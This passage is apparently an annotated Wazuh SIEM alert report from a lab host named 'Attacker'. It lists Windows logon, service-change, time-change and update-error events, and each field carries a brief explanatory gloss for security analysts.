No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533894.192727
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:52:30.5148874Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43500
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  14292
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Service startup type was changed

🧠 What happened? Service startup type was changed

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:35.128+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:35.128+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Service startup type was changed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61104
Numeric ID of the detection rule that fired.

rule.info:  This does not appear to be logged on Windows 2000
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'policy_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533895.200065
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {555908d1-a6d7-4695-8e1e-26931d2012f4}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  7040
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8080000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:46:35.8478096Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2935
Incremental log record number – handy for timeline order.

data.win.system.processID:  772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  13224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param1:  Background Intelligent Transfer Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param2:  demand start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param3:  auto start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param4:  BITS
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:35.964+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:35.964+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  16
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533895.201877
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:52:32.6925669Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43508
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  11096
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

System time changed.

🧠 What happened? System time changed.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:36.397+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:36.397+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  System time changed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60132
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'time_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.gpg13:  ['1.3', '4.13']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533896.209215
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4616
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12288
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:55:16.5362324Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43510
Incremental log record number – handy for timeline order.

data.win.system.processID:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  12620
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The system time was changed. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Process Information: Process ID: 0x1c48 Name: C:\Windows\System32\svchost.exe Previous Time: ‎2025‎-‎04‎-‎17T16:55:16.492136900Z New Time: ‎2025‎-‎04‎-‎17T16:55:16.516484900Z This event is generated when the system time is changed. It is normal for the Windows Time Service, which runs with System privilege, to change the system time on a regular basis. Other system time changes may be indicative of attempts to tamper with the computer."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-19
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  LOCAL SERVICE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.previousTime:  2025-04-17T16:55:16.4921369Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.newTime:  2025-04-17T16:55:16.5164849Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  0x1c48
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\svchost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows System error event

🧠 What happened? Windows System error event

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:31:36.871+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:36.871+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows System error event
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61102
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'system_error']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gpg13:  ['4.3']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533896.212420
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-WindowsUpdateClient
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {945a8954-c147-4acd-923f-40c45405a658}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  20
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  13
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000028
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:47:27.8984342Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2941
Incremental log record number – handy for timeline order.

data.win.system.processID:  9648
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  14168
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  ERROR
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Installation Failure: Windows failed to install the following update with error 0x80073D02: 9NZKPSTSNW4P-Microsoft.XboxGamingOverlay."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.errorCode:  0x80073d02
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.updateTitle:  9NZKPSTSNW4P-Microsoft.XboxGamingOverlay
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.updateGuid:  {c6a13812-e71e-4775-86f7-c7f3e4982a80}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.updateRevisionNumber:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.serviceGuid:  {855e8a7c-ecb4-4ca3-b045-1dfa50104289}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:36.877+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:36.877+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  17
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533896.214327
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
